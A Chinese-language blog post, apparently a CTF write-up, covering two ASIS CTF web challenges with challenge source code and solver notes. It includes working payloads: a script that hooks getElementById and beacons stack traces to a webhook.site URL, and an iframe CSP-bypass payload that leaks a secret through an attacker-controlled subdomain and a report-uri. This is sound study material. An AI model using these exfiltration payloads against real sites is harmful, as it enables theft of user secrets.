<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"chensonghi.github.io.","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","Sidebar Display (only for Muse | Mist), available values":["always  expand for all pages automatically."],"display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="Pupptear:***报错追踪文件名字 1234567Do you know what Puppeteer&amp;#x27;s friends call him when he cries? Pupptear... hahahaah[attachment](&lt;https:&#x2F;&#x2F;asisctf.com&#x2F;tasks&#x2F;pupptear_0ab53ea3b73da58a4d0854bf42ec1ea166">
<meta property="og:type" content="article">
<meta property="og:title" content="ASISCTF">
<meta property="og:url" content="https://chensonghi.github.io./2023/12/25/ASISCTF/index.html">
<meta property="og:site_name" content="星河风">
<meta property="og:description" content="Pupptear:***报错追踪文件名字 1234567Do you know what Puppeteer&amp;#x27;s friends call him when he cries? Pupptear... hahahaah[attachment](&lt;https:&#x2F;&#x2F;asisctf.com&#x2F;tasks&#x2F;pupptear_0ab53ea3b73da58a4d0854bf42ec1ea166">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://chensonghi.github.io./2023/12/25/ASISCTF/image-20240101163004369-1707063823030-1.png">
<meta property="og:image" content="https://chensonghi.github.io./2023/12/25/ASISCTF/image-20240101162824320-1707063823030-2.png">
<meta property="article:published_time" content="2023-12-24T16:22:51.000Z">
<meta property="article:modified_time" content="2024-02-04T16:25:27.353Z">
<meta property="article:author" content="chleynx">
<meta property="article:tag" content="2023">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://chensonghi.github.io./2023/12/25/ASISCTF/image-20240101163004369-1707063823030-1.png">

<link rel="canonical" href="https://chensonghi.github.io./2023/12/25/ASISCTF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ASISCTF | 星河风</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">星河风</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://chensonghi.github.io./2023/12/25/ASISCTF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/ch.jpg">
      <meta itemprop="name" content="chleynx">
      <meta itemprop="description" content="不是看到希望才坚持，而是坚持了才能看到希望">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="星河风">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ASISCTF
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-12-25 00:22:51" itemprop="dateCreated datePublished" datetime="2023-12-25T00:22:51+08:00">2023-12-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-02-05 00:25:27" itemprop="dateModified" datetime="2024-02-05T00:25:27+08:00">2024-02-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/challenge/" itemprop="url" rel="index"><span itemprop="name">challenge</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Pupptear"><a href="#Pupptear" class="headerlink" title="Pupptear:"></a><strong>Pupptear:</strong></h2><p>***报错追踪文件名字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Do you know what Puppeteer&#x27;s friends call him when he cries? Pupptear... hahahaah</span><br><span class="line"></span><br><span class="line">[attachment](&lt;https://asisctf.com/tasks/pupptear_0ab53ea3b73da58a4d0854bf42ec1ea166283b3e.txz&gt;)</span><br><span class="line"></span><br><span class="line">nc 18.195.96.13 2000</span><br><span class="line"></span><br><span class="line">Flag format for Pupptear: ^ASIS&#123;[^&#123;&#125;]+&#125;$</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/7865afae-5d80-486d-b9d3-9239e8b4ff5e/pupptear.txz">pupptear.txz</a></p>
<p>oh ok</p>
<p>I get the concept.</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="title function_">input</span>(<span class="string">&#x27;input URL (b64ed): &#x27;</span>)</span><br><span class="line"><span class="keyword">if</span>(not re.<span class="title function_">match</span>(<span class="string">&#x27;^[A-Za-z0-9=+/]+$&#x27;</span>,url)):</span><br><span class="line">	<span class="title function_">print</span>(<span class="string">&#x27;bad URL&#x27;</span>)</span><br><span class="line">	<span class="title function_">exit</span>(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">os.<span class="title function_">close</span>(<span class="number">0</span>)</span><br><span class="line">os.<span class="title function_">close</span>(<span class="number">1</span>)</span><br><span class="line">os.<span class="title function_">close</span>(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">containerName = <span class="string">&#x27;&#x27;</span>.<span class="title function_">join</span>(random.<span class="title function_">choice</span>(string.<span class="property">ascii_uppercase</span> + string.<span class="property">digits</span>) <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="title function_">range</span>(<span class="number">0x10</span>))</span><br><span class="line">os.<span class="title function_">system</span>(f<span class="string">&#x27;bash -c &quot;sleep 5 &amp;&amp; docker kill &#123;containerName&#125; 2&gt;/dev/null&quot; &amp;&#x27;</span>)</span><br><span class="line">os.<span class="title function_">system</span>(f<span class="string">&#x27;docker run --name &#123;containerName&#125; pupptear bash -c \\&#x27;</span>/<span class="variable constant_">ASIS</span>*/index.<span class="property">js</span> &#123;url&#125;\\<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">#!<span class="regexp">/usr/</span>bin/env node</span><br><span class="line"><span class="keyword">const</span> puppeteer = <span class="built_in">require</span>(<span class="string">&#x27;puppeteer&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> flag = <span class="string">&#x27;flag&#123;test-flag&#125;&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">visit</span>(<span class="params">url</span>)&#123;</span><br><span class="line">	<span class="keyword">let</span> browser;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(!<span class="regexp">/^https?:\\/</span>\\<span class="comment">//.test(url))&#123;</span></span><br><span class="line">		<span class="keyword">return</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">try</span>&#123;</span><br><span class="line">		browser = <span class="keyword">await</span> puppeteer.<span class="title function_">launch</span>(&#123;</span><br><span class="line">		    <span class="attr">pipe</span>: <span class="literal">true</span>,</span><br><span class="line">		    <span class="attr">args</span>: [</span><br><span class="line">		        <span class="string">&quot;--no-sandbox&quot;</span>,</span><br><span class="line">		        <span class="string">&quot;--disable-setuid-sandbox&quot;</span>,</span><br><span class="line">		        <span class="string">&quot;--js-flags=--noexpose_wasm,--jitless&quot;</span>,</span><br><span class="line">		        <span class="string">&quot;--ignore-certificate-errors&quot;</span>,</span><br><span class="line">		    ],</span><br><span class="line">		    <span class="attr">executablePath</span>: <span class="string">&quot;/usr/bin/google-chrome-stable&quot;</span>,</span><br><span class="line">		    <span class="attr">headless</span>: <span class="string">&#x27;new&#x27;</span></span><br><span class="line">		&#125;);</span><br><span class="line"></span><br><span class="line">		<span class="keyword">let</span> page = <span class="keyword">await</span> browser.<span class="title function_">newPage</span>();</span><br><span class="line">		<span class="keyword">await</span> page.<span class="title function_">goto</span>(url,&#123; <span class="attr">timeout</span>: <span class="number">2000</span> &#125;);</span><br><span class="line">		<span class="keyword">await</span> page.<span class="title function_">waitForFunction</span>(<span class="function"><span class="params">flag</span>=&gt;</span>&#123;</span><br><span class="line">			<span class="keyword">let</span> el = <span class="variable language_">document</span>.<span class="title function_">getElementById</span>(<span class="string">&#x27;flag&#x27;</span>)</span><br><span class="line">			<span class="keyword">if</span>(!el) <span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">			el.<span class="property">value</span> = flag</span><br><span class="line">			<span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">		&#125;,&#123; <span class="attr">timeout</span>: <span class="number">2000</span> &#125;,flag)</span><br><span class="line">		<span class="keyword">await</span> <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">r</span>=&gt;</span><span class="built_in">setTimeout</span>(r,<span class="number">3000</span>));</span><br><span class="line">	&#125;<span class="keyword">catch</span>(e)&#123;&#125;</span><br><span class="line">	<span class="keyword">try</span>&#123;<span class="keyword">await</span> browser.<span class="title function_">close</span>();&#125;<span class="keyword">catch</span>(e)&#123;&#125;</span><br><span class="line">	process.<span class="title function_">exit</span>(<span class="number">0</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>get folder name? have no idea.</p>
<p>need to check if we can get flag during page move delay<img src="/2023/12/25/ASISCTF/image-20240101163004369-1707063823030-1.png" alt="image-20240101163004369"></p>
<p>fake flag. need to get folder name. i guess stacktrace from waitforfunction?</p>
<figure class="highlight docker"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">WORKDIR</span><span class="language-bash"> /app</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> ./stuff/ /app/</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> PUPPETEER_SKIP_DOWNLOAD=1 npm ci</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> +x /app/index.js</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> useradd -m www</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> 777 /home/www/ -R</span></span><br><span class="line"><span class="keyword">ENV</span> FLAG=ASIS&#123;test-flag&#125;</span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">mv</span> /app/ /<span class="variable">$FLAG</span>/</span></span><br><span class="line"><span class="keyword">WORKDIR</span><span class="language-bash"> /</span></span><br><span class="line"><span class="keyword">USER</span> www</span><br></pre></td></tr></table></figure>

<p>I guess yes.</p>
<p>One way is to hook <code>Error</code> and find filename, but I have to install puppeteer for testing. I don’t know how things work internally for puppeteer😕</p>
<p>If no one solves it I will try out sometime tomorrow.</p>
<p>i dont know either. ppt is heavily coupled with chrome devtools, i guess the function execution is a part of devtools protocol.</p>
<p>hook getElementById, read stacktrace.</p>
<p>solved:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">id</span>=<span class="string">&quot;flag&quot;</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">const</span> oldFunc = <span class="variable language_">document</span>.<span class="property">getElementById</span></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">document</span>.<span class="property">getElementById</span> = <span class="keyword">function</span>(<span class="params">id</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">const</span> e = <span class="keyword">new</span> <span class="title class_">Error</span>();</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">const</span> stack = e.<span class="property">stack</span>.<span class="title function_">split</span>(<span class="string">&#x27;\\n&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">      <span class="title function_">fetch</span>(<span class="string">`<span class="subst">$&#123;<span class="variable language_">document</span>.location.href&#125;</span>`</span>, &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="attr">headers</span>: &#123;</span></span><br><span class="line"><span class="language-javascript">          <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/json&#x27;</span></span></span><br><span class="line"><span class="language-javascript">        &#125;,</span></span><br><span class="line"><span class="language-javascript">        <span class="attr">body</span>: <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123;</span></span><br><span class="line"><span class="language-javascript">          id,</span></span><br><span class="line"><span class="language-javascript">          stack</span></span><br><span class="line"><span class="language-javascript">        &#125;)</span></span><br><span class="line"><span class="language-javascript">      &#125;)</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">return</span> oldFunc.<span class="title function_">apply</span>(<span class="variable language_">document</span>, <span class="variable language_">arguments</span>)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">  </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>or</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">const HOOK_URL = &quot;https://webhook.site/ae22bc03-bb75-4080-9702-36cbb57cc53d&quot;;</span><br><span class="line"></span><br><span class="line">let sent = false;</span><br><span class="line">function hook() &#123;</span><br><span class="line">  if (sent) return;</span><br><span class="line">  sent = true;</span><br><span class="line"></span><br><span class="line">  const e = new Error();</span><br><span class="line">  navigator.sendBeacon(HOOK_URL, e.stack);</span><br><span class="line">&#125;</span><br><span class="line">document.getElementById = hook;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2023/12/25/ASISCTF/image-20240101162824320-1707063823030-2.png" alt="image-20240101162824320"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Error</span><br><span class="line">    at HTMLDocument.hook [as getElementById] (http://47.108.69.229/?id&#123;aaa111&#125;:11:13)</span><br><span class="line">    at eval (eval at G (:3:1641), &lt;anonymous&gt;:4:22)</span><br><span class="line">    at P.&lt;anonymous&gt; (pptr:evaluateHandle;WaitTask.rerun (/ASIS&#123;d1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5&#125;/node_modules/puppeteer-core/lib/cjs/puppeteer/common/WaitTask.js:80:54):4:36)</span><br><span class="line">    at P.start (pptr:internal:3:3734)</span><br><span class="line">    at pptr:evaluate;WaitTask.rerun (/ASIS&#123;d1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5&#125;/node_modules/puppeteer-core/lib/cjs/puppeteer/common/WaitTask.js:110:32):2:29</span><br></pre></td></tr></table></figure>

<p>ASIS{d1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5}</p>
<h2 id="gimme-csp-warmup"><a href="#gimme-csp-warmup" class="headerlink" title="gimme csp(warmup):"></a><strong>gimme csp(warmup):</strong></h2><p>绕过csp——-iframe标签</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">hint for beginners: read about CSPs and Iframes and what features they can offer that you can use to bypass or exfiltrate things. The challenge isn&#x27;t easy if you are new to CTFs or don&#x27;t have much experience however it should be the easiest web challenge.</span><br><span class="line"></span><br><span class="line">[attachment](&lt;https://asisctf.com/tasks/gimme-csp_2b4abfa898695e4a37f7f36e4ba1b35a88f37103.txz&gt;)</span><br><span class="line"></span><br><span class="line">website: &lt;https://gimmecsp.asisctf.com&gt;</span><br><span class="line">Admin bot: &lt;http://18.195.96.13:8001&gt;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/afec582d-a963-4f8b-9bbb-a140d32e55dc/gimme-csp.txz">gimme-csp.txz</a></p>
<p>ok</p>
<p>I can solve</p>
<p>server returned multiple csp header and only the default-src ‘none’ works</p>
<p>one last step…</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">&quot;&lt;https://gimmecsp.asisctf.com/?letter=$gift$&gt;&lt;/pre&gt;1234&lt;link rel=&#x27;stylesheet&#x27; href=&#x27;//fe.gy/1.css&#x27;&gt;&lt;/script&gt;&quot;</span> csp=<span class="string">&quot;stylescript-src-src-elem &#x27;self&#x27; &#x27;unsafe-eval&#x27; &lt;https://fe.gy&gt; &#x27;unsafe-inline&#x27;;&quot;</span>  referrerpolicy=<span class="string">&quot;no-referrer&quot;</span>&gt;&lt;<span class="regexp">/iframe&gt;&lt;/</span>body&gt;</span><br></pre></td></tr></table></figure>

<p>oh</p>
<p>got an idea 🙂</p>
<p>I think the <code>csp</code> attribute does some sort of sandboxing, we need to find some good way to prefetch or load the flag</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">&quot;&lt;https://gimmecsp.asisctf.com/?letter=&gt;&lt;/pre&gt;1234&lt;img src=&#x27;&lt;https://fe.gy/$gift$&gt;&#x27;&gt;&lt;/script&gt;&quot;</span> csp=<span class="string">&quot;img-src &lt;https://fe.gy&gt;; defascript-srcult-sscript-srcrc &lt;https://fe.gy&gt;; repscript-srcort-uscript-srcri &lt;https://fe.gy&gt;;&quot;</span> referrerpolicy=<span class="string">&quot;no-referrer&quot;</span>&gt;&lt;<span class="regexp">/iframe&gt;&lt;/</span>body&gt;</span><br></pre></td></tr></table></figure>

<p>ok</p>
<p>I think I can get flag now?</p>
<p>Here’s a way</p>
<p>solved now</p>
<p>exploit:</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">&quot;&lt;https://gimmecsp.asisctf.com/?letter=&gt;&lt;/pre&gt;1234&lt;img src=&#x27;&lt;http://$gift$.harold.kim:1337/&gt;&#x27;&gt;&lt;/script&gt;&quot;</span> csp=<span class="string">&quot;img-src https://*; defascript-srcult-sscript-srcrc &lt;http://harold.kim:1337/&gt;; repscript-srcort-uscript-srcri &lt;https://azusawa.world/a.php;&quot;</span>&gt; referrerpolicy=<span class="string">&quot;no-referrer&quot;</span>&gt;&lt;<span class="regexp">/iframe&gt;&lt;/</span>body&gt;</span><br><span class="line">&#123;<span class="string">&quot;csp-report&quot;</span>:&#123;<span class="string">&quot;document-uri&quot;</span>:<span class="string">&quot;[&lt;https://gimmecsp.asisctf.com/?letter=&gt;&lt;/pre&gt;1234&lt;img src=&#x27;&lt;http://$gift$.harold.kim:1337/&gt;&#x27;&gt;&lt;/script&gt;&quot;</span>,<span class="string">&quot;referrer&quot;</span>:<span class="string">&quot;&quot;</span>,<span class="string">&quot;violated-directive&quot;</span>:<span class="string">&quot;img-src&quot;</span>,<span class="string">&quot;effective-directive&quot;</span>:<span class="string">&quot;img-src&quot;</span>,<span class="string">&quot;original-policy&quot;</span>:<span class="string">&quot;img-src](&lt;https://gimmecsp.asisctf.com/?letter=%3C/pre%3E1234%3Cimg%20src=%27http://$gift$.harold.kim:1337/%27%3E%3C/script%3E%22,%22referrer%22:%22%22,%22violated-directive%22:%22img-src%22,%22effective-directive%22:%22img-src%22,%22original-policy%22:%22img-src&gt;) https://*; default-src &lt;http://harold.kim:1337/&gt;; report-uri [&lt;https://azusawa.world/a.php;&quot;</span>,<span class="string">&quot;disposition&quot;</span>:<span class="string">&quot;enforce&quot;</span>,<span class="string">&quot;blocked-uri&quot;</span>:<span class="string">&quot;https://asis&#123;test-flag&#125;.harold.kim:1337/&quot;</span>,<span class="string">&quot;line-number&quot;</span>:<span class="number">1</span>,<span class="string">&quot;source-file&quot;</span>:<span class="string">&quot;https://gimmecsp.asisctf.com/&quot;</span>,<span class="string">&quot;status-code&quot;</span>:<span class="number">200</span>,<span class="string">&quot;script-sample&quot;</span>:<span class="string">&quot;&gt;](&lt;https://azusawa.world/a.php;%22,%22disposition%22:%22enforce%22,%22blocked-uri%22:%22https://asis%7Btest-flag%7D.harold.kim:1337/%22,%22line-number%22:1,%22source-file%22:%22https://gimmecsp.asisctf.com/%22,%22status-code%22:200,%22script-sample%22:%22&gt;)&quot;</span>&#125;&#125;<span class="string">``</span><span class="string">`</span></span><br></pre></td></tr></table></figure>

<p>ASIS{1m-n07-r34dy-f0r-2024-y3t-dfadb}</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>chleynx
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://chensonghi.github.io./2023/12/25/ASISCTF/" title="ASISCTF">https://chensonghi.github.io./2023/12/25/ASISCTF/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/2023/" rel="tag"># 2023</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/10/20/SQL%E6%B3%A8%E5%85%A5/" rel="prev" title="SQL注入">
      <i class="fa fa-chevron-left"></i> SQL注入
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/12/25/chuhuibei/" rel="next" title="楚慧杯">
      楚慧杯 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  




          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
